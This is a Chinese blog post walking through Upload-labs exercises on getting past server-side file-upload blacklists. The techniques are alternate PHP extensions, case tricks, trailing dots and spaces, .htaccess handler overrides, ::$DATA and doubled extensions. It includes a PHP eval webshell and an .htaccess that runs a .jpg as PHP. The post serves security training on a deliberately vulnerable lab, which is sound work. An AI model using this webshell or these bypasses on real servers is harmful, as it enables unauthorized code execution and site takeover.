上传验证绕过——服务端黑名单绕过

最新推荐文章于 2024-05-14 10:00:00 发布
最新推荐文章于 2024-05-14 10:00:00 发布
阅读量887 收藏 3
点赞数
分类专栏: 网络安全 文章标签: 网络安全 web安全 安全 网络攻击模型 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Williamanddog/article/details/128776813
版权

服务端黑名单绕过

  1. 特殊可解析后缀

Upload-labs(Pass-03)根据源码可以看出,只是做了个简单的后缀名黑名单,识别上传文件的类型是 否为 '.asp','.aspx','.php','.jsp' 中的一个,若是其中的一个,则不允许上传。 但是可以上传其他任意后缀。比如说:. phtml .phps .php5 .pht ,但如果上传的是.php5这种类型文 件,想要被当成php执行的话,需要有个前提条件:即Apache的httpd.conf有如下配置代码(靶场环境 未配置好,仅做上传测试)。

所以由于服务端采用黑名单的过滤方式,这里可以使用php3或者php5后缀上传,直接通过burp修改后缀名

上传成功

(此靶机环境测试未解析,仅作上传测试即可)

  1. 大小写绕过(√)

Upload-labs(Pass-06)通过查看源码可以发现,虽然设置了黑名单对常见的后缀进行过滤,但并未对 后缀名大小写进行统一。可以利用大小写进行绕过。例如:.PHp

burp改包

上传成功

  1. 点绕过(√)

Upload-labs(Pass-08)分析代码没有去除点,直接在文件后面加上点

burp抓包并修改

上传成功

在Windows系统中会自动去除文件名最后的 . ,因此在Windows系统中可以使用此方法绕过。

  1. 空格绕过

Upload-labs(Pass-07)通过代码分析没有去空格,在文件后缀加空格后上传

burp抓包修改

上传成功

在Windows系统中会自动去除文件名最后的空格,因此在Windows系统中可以使用此方法绕过。

  1. 配合解析绕过(√)

Upload-labs(Pass-05)

这一关的思路是它没有循环验证,也就是说这些首尾去空,删除末尾的点,去除字符串:$SDATA,转换 为小写这些东西只是验证了一次,所以绕过思路也很简单:在数据包中把后缀名改为.php. .(两个点之 间有个空格) 验证过程:首先系统发现最后有一个点,这时会把它去掉,又发现有一个空格,也会把它去掉,这时还 有一个点,也就是.php. 由于系统只验证一次,所以不会再去掉剩下的点,这时就可以上传成功。

  1. htaccess文件绕过(√)

在利用.htaccess文件之前,我们先来了解一下什么是.htaccess规则文件。 .htaccess文件(或者"分布式配置文件")全称是Hypertext Access(超文本入口)。 提供了针对目录改变配置的方法, 即 在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可 以帮我们实现: 网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列 表、配置默认文档等功能。上传.htaccess文件,来绕过黑名单。 前提条件 1.mod_rewrite模块开启。 2.AllowOverride All

Upload-labs(Pass-04)源码分析,这个比03增加了黑名单量。但是,中间件为Apache的情况下,黑 名单未校验htaccess文件,导致可上传htaccess文件,绕过黑名单检测。

由于.htaccess还是没有过滤,可以重写文件解析规则绕过,上传一个 .htaccess,文件内容如下,意思 是设置当前目录所有文件都使用PHP解析,那么无论上传任何文件,只要文件内容符合PHP语言代码规 范,就会被当作PHP执行。不符合则报错。

我们需要先准备好两个文件( .htaccess 和 post.jpg)

<!-- .htaccess文件 -->

<FilesMatch "magedu.jpg">

Sethandler application/x-httpd-php

</FilesMatch>

//magedu.jpg

<?php @eval($_POST["magedu"]); ?>

注意: .htaccess文件不能起名字,他就是.htaccess文件,如果你将他改为4.htaccess或者其他的什 么名字是不可以的,无法解析。在实战中有可能上传上去这个文件会被自动重命名,被重命名了就不可以了。

接下来就是先将 .htaccess 文件上传,从而覆盖父目录对上传目录的影响,然后再上传 mgedu.jpg 文 件,从而完成 .htaccess 文件上传解析漏洞的利用。

上传.htaccess

再上传post.jpg

上传成功

  1. ::$DATA绕过

在Windows中,如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且 保持::$DATA之前的文件名。使用它的目的就是不检查后缀名,例如:

phpinfo.php::$DATA

Windows会自动去掉末尾的::$DATA变成 phpinfo.php

Upload-labs(Pass-09)抓包修改文件后缀

可以看到,上传成功。但是Linux服务器未去掉后缀,所以解析不了。

8.双写后缀名绕过(√)

Upload-labs(Pass-11)从源码中可以发现,源码中定义了黑名单列表,我们上传文件的后缀名凡是符 合黑名单中任意一个后缀都会被替换为空,那么我们可以利用双写后缀的方式进行绕过。例如: phpinfo.pphphp 替换后变成 phpinfo.php

抓包修改

上传成功

梓桐sama
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【文件上绕过总结
weixin_55205599的博客
07-02 2888
hp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。eg:允许上.jpg,不允许上.php,如何绕过.php一句话木马呢?eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"p。eg:黑名单过滤中只有".php",没有".php "、“ .php”eg : a.JSP、a.Jsp 、a.jsP、a.jSP等等。eg:"a.php.",黑名单没有对"php."过滤,则绕过。eg: a.php改为 a.php::$data。
jsp文件上_原创 | 绕过后缀安全检查进行文件上
weixin_39767645的博客
11-25 3419
点击上方蓝字 关注我吧引言文件上是web中比较常见的业务,例如上头像、简历等。当前也有很多开源工具包进行辅助实现,例如Apache Commons FileUpload、Jfinal cos等。但是若在开发过程中没有做好相关的安全防护,攻击者可以通过上恶意脚本来获取系统权限。对上的文件后缀名进行白名单限制也是比较简单有效的方式。以下是实际业务中发现的一处绕过后缀安全检查进行文件...
文件上(包括编辑器上)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上漏洞可做参考)
最新发布
wangluoanquan111的博客
05-14 979
由于服务器认为上的是JPEG图片,所以文件将被放行,即使上的实际是一个可执行的PHP脚本,也将被视为正常的图片文件。type,即便上一个“avatar.jpg”文件,实际上这是一个php脚本文件,攻击者成功绕过了文件类型检测机制,该文件会被服务器识别为php文件并执行其中的恶意代码。注意,以上是常用的一些示例,但黑客可能会使用其他扩展名和方法来绕过黑名单。如果限制文件大小的方法不充分,攻击者可以通过在上之前将大文件拆分成多个小文件并分别上绕过限制,在上时,攻击者可能会将文件重新组合起来。
【文件上绕过】三、黑名单不全绕过
ssrf
10-10 1607
文章目录一、描述二、实验原理三、检测代码四、添加黑名单中未做限制的后缀进行绕过 一、描述 Web系统可能会采用黑名单的方式进行过滤。而过滤的方式存在一定的缺陷,比如存在过滤的黑名单不全,未考虑大小写,以及对上文件名单次进行敏感字符清除。 二、实验原理 当下流行的网站开发语言均存在多个可解析后缀,例如asp脚本语言的可解析后缀,不仅仅是.asp,还有.cer,.asa等等。而由于开发人员相关知识或安全意识的局限性(欠缺),导致设置的黑名单不全。这时就可以通过其他可解析后缀绕过黑名单可执行的websh
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
热门推荐
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读写文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及时发现和响应内网攻击至关重要。企图告警需排查:当发出告警信号时,需要仔细排查可能的企图行为。不仅要关注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
信息安全技术:绕过服务目录路径检测上.pptx
11-01
【信息安全技术:绕过服务目录路径检测上】 在信息安全领域,服务目录路径检测是保护系统免受恶意文件上攻击的重要措施。然而,如果这种检测不够严谨,攻击者可能会利用漏洞绕过防御,实现任意文件上,...
信息安全技术:绕过服务MIME类型检测上.pptx
11-01
【信息安全技术:绕过服务MIME类型检测上】 在信息安全领域,保护系统免受恶意文件上攻击是一项至关重要的任务。MIME(Multipurpose Internet Mail Extensions)类型是互联网上定义文件格式的一种标准,用于...
ChangeTcp_new——服务说明文档-0.1.pdf
12-19
ChangeTcp_new——服务说明文档-0.1.pdf,是上一个代码的说明文档,顺手写了,懒得一起打包,就分开上了,大家凑个凑合看看就行
微信小程序——服务获取小程序二维码 永久有效 数量无限制
12-22
微信官方文档——小程序获取二维码原文链接 请求地址 POST方法 https://api.weixin.qq.com/wxa/getwxacodeunlimit? access_token=ACCESS_TOKEN 后台代码 import org.springframework.http.HttpEntity; import org...
当当网——客户——服务
06-14
标题 "当当网——客户——服务" 暗示了我们要探讨的是关于当当网的客户服务架构以及它们之间的交互。当当网是中国知名的在线图书、电子商品零售平台,其客户通常指的是用户使用的应用程序,如手机APP或...
后缀绕过
12-13
在上的限制不能上某些的后缀,对于上中各绕过的描述
文件上漏洞绕过
派大星的博客
07-20 275
文件上漏洞 文章目录文件上漏洞文件上黑名单绕过 文件上黑名单绕过 1.大小写绕过 2.其他后缀 常用后缀 asp/aspx:asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr php:php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml js:jsp,jspa,jspx,jsw,jsv,jspf,
文件上漏洞-绕过方式总结
Echo__h的博客
04-29 924
文件上绕过方式 图片马制作
文件上绕过的多种姿势
qq_32445755的博客
04-19 413
此文件可以实现:文件夹密码保护、用户自动重定向、自定义错误页面、改变文件扩展名、封禁特定ip地址的用户、只允许特定ip地址用户、禁止目录列表,以及使用其他文件作为index文件等功能。上黑名单以外的后缀名,在iis里asp禁止上了,可以上asa、cer、cdx这些后缀,如果网站允许.net执行,可以上ashx代替aspx。#如果目录存在,我们将把它公开,这样我们就可以定义在其中运行shell所需的服务器函数#“如上所示,我们可以首先导航到属于SmarterMail服务的App_Data目录,”
文件上验证常见的绕过方式!
oldboyedu1的博客
03-29 1595
在开发中,为了方便维护和更新,会先对扩展名进行验证,如果上文件的扩展名为可执行脚本,便会对其POST的数据进行检测,如果存在恶意代码就会禁止上。而对于这类上检测的绕过大致有这几种思路,一是利用变种木马绕过其检测;白名单检测安全性远高于黑名单检测,仅允许上白名单所允许的几种扩展名,因此黑名单中的大小写混淆、特殊的扩展名等绕过方式对白名单检测均无效。黑名单检测是常见的一种上验证方式,不允许上黑名单中存在的扩展名,其安全性低于白名单检测,对其的绕过方式也远多于白名单检测。6、服务器目录限制的绕过
web安全第五天:绕过黑名单监测实现文件上
cc777777777的博客
02-26 201
web安全第五天:绕过黑名单监测实现文件上
网络安全笔记--文件上1(文件上基础、常见后验证黑名单、白名单、后绕过方式)
swy66的博客
08-17 3549
文件上相关知识基础,白名单绕过黑名单绕过
【文件上绕过总结_文件上后缀名绕过,大厂网络安全研发岗面试复盘
m0_61330806的博客
04-09 846
ab:a.php::$data 相当于访问ab文件夹下的a.phpeg: a.php改为 a.php::$data5、单次过滤绕过思路:已知过滤规则,假如都是过滤一次,则可尝试两次绕过6、后缀双写绕过场景:过滤规则检测到黑名单后缀时,将文件名中对应后缀删除的情况eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"pphphp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php程序认为处理完毕,不拦截,故绕过白名单绕过
研究文件上漏洞服务黑名单检查及绕过类型的意义
05-27
研究文件上漏洞服务黑名单检查及绕过类型的意义在于加强对服务的安全防护措施,防止黑客通过上恶意文件来攻击系统。服务通常使用黑名单来限制上的文件类型和大小,但是黑客可以通过一些技术手段来绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值